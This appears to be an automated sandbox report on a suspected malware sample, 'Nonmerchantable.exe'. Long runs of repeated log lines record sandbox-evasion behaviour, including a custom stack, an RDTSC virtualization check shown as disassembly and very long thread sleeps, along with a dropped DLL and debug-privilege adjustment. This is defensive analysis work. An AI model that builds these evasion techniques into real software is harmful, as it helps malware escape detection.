Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Nonmerchantable.exe	API/Special instruction interceptor: Address: 599E473
Source: C:\Users\user\Desktop\Nonmerchantable.exe	API/Special instruction interceptor: Address: 481E473

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Nonmerchantable.exe	RDTSC instruction interceptor: First address: 5974ADE second address: 5974ADE instructions: 0x00000000 rdtsc 0x00000002 test ch, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F136CB7D253h 0x00000008 test di, 2992h 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Nonmerchantable.exe	RDTSC instruction interceptor: First address: 47F4ADE second address: 47F4ADE instructions: 0x00000000 rdtsc 0x00000002 test ch, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F136CECDCE3h 0x00000008 test di, 2992h 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Memory allocated: 5800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Memory allocated: 36160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Memory allocated: 35FA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599559	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599201	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594248	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Window / User API: threadDelayed 1486			Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Window / User API: threadDelayed 8352			Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmABCD.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Nonmerchantable.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3084	Thread sleep count: 1486 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3084	Thread sleep count: 8352 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599559s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396	Thread sleep time: -594248s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0040646B FindFirstFileA,FindClose,	5_2_0040646B
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_004027A1 FindFirstFileA,	5_2_004027A1
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	5_2_004058BF

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599559	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599201	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598247	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Thread delayed: delay time: 594248	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Nonmerchantable.exe	API call chain: ExitProcess graph end node			graph_0-4021
Source: C:\Users\user\Desktop\Nonmerchantable.exe	API call chain: ExitProcess graph end node			graph_0-4190

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\Nonmerchantable.exe

0_2_6F951A98

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

